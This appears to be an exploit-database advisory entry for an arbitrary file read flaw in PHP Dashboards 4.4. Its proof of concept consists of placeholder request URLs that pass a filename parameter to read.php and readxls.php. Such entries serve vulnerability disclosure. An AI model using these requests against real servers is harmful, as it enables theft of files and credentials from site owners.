vendor:
PHP Dashboards
by:
Ihsan Sencan
N/A
CVSS
N/A
Arbitrary File Read
N/A
CWE
Product Name: PHP Dashboards
Affected Version From: 4.4
Affected Version To: 4.4
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: WiN7_x64/KaLiLinuX_x64
2017
PHP Dashboards NEW 4.4 – Arbitrary File Read
The vulnerability allows an attacker to arbitrary file read. Proof of Concept: 1 http://localhost/[PATH]/php/file/read.php?filename=[FILE] 2 http://localhost/[PATH]/php/file/readxls.php?filename=[FILE] http://localhost/[PATH]/php/file/PHPReader/temp/[.......].xls Etc..
Mitigation:
N/A